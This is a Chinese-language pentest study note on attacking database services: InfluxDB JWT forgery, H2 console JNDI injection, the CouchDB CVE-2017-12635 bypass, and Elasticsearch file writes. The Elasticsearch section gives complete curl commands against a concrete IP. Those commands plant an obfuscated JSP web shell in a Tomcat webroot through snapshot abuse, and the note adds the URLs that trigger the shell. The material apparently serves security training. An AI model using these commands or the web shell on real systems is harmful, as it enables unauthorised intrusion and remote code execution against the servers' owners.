服务攻防——数据库类型安全

服务攻防——数据库类型安全

1.influxdb-未授权访问-jwt验证

2.H2database-未授权访问-配置不当

3.CouchDB-权限绕过配合RCE-漏洞

4.ElasticSearch-文件写入&RCE-漏洞

1.influxdb-未授权访问-jwt验证

该数据库的默认端口：8086 8088

influxdb是一款著名的时序数据库，其使用jwt作为鉴权方式。在用户开启了认证，但未设置参数shared-secret的情况下，jwt的认证密钥为空字符串，此时攻击者可以伪造任意用户身份在influxdb中执行SQL语句。 借助jwt.io来生成jwt token

2.H2 database-未授权访问-配置不当

默认端口：20051

H2 database是一款Java内存数据库，多用于单元测试。H2 database自带一个Web管理页面，在Spirng开发中，如果我们设置如下选项，即可允许外部用户访问Web管理页面，且没有鉴权：默认端口：

spring.h2.console.enabled=true 

spring.h2.console.settings.web-allow-others=true 

利用这个管理页面，我们可以进行JNDI注入攻击，进而在目标环境下执行任意命令。

3.CouchDB-权限绕过配合RCE-漏洞

默认端口：5984

Apache CouchDB是一个开源数据库，专注于易用性和成为”完全拥抱web的数据库”。它是一个使用JSON作为存储格式，JavaScript作为查询语言，MapReduce和HTTP作为API的NoSQL数据库。应用广泛，如BBC用在其动态内容展示平台，Credit Suisse用在其内部的商品部门的市场框架，Meebo，用在其社交平台（web和应用程序）

CouchDB-权限绕过-CVE-2017-12635

4.ElasticSearch-文件写入&RCE-漏洞

Elasticsearch 文件写入 wooyun_2015_110216

9200一般为ElasticSearch的常用端口，此漏洞环境需要与中间件使用

1、发现9200端口存在elasticsearch页面，8080存在tomcat目录

2、利用ElasticSearch写入后门到/usr/local/tomcat/webapps/wwwroot/

curl -XPOST http://123.58.236.76:31556/yz.jsp/yz.jsp/1 -d'

{"<%new java.io.RandomAccessFile(application.getRealPath(new String(new byte[]{47,116,101,115,116,46,106,115,112})),new String(new byte[]{114,119})).write(request.getParameter(new String(new byte[]{102})).getBytes());%>":"test"}

'



curl -XPUT 'http://123.58.236.76:31556/_snapshot/yz.jsp' -d '{

​     "type": "fs",

​     "settings": {

​          "location": "/usr/local/tomcat/webapps/wwwroot/",

​          "compress": false

​     }

}'



curl -XPUT "http://123.58.236.76:31556/_snapshot/yz.jsp/yz.jsp" -d '{

​     "indices": "yz.jsp",

​     "ignore_unavailable": "true",

​     "include_global_state": false

}'

3、访问8080端口snapshot-yz.jsp文件写入代码到test.jsp中

http://123.58.236.76:31557/wwwroot/indices/yz.jsp/snapshot-yz.jsp?f=success

http://123.58.236.76:31557/wwwroot/test.jsp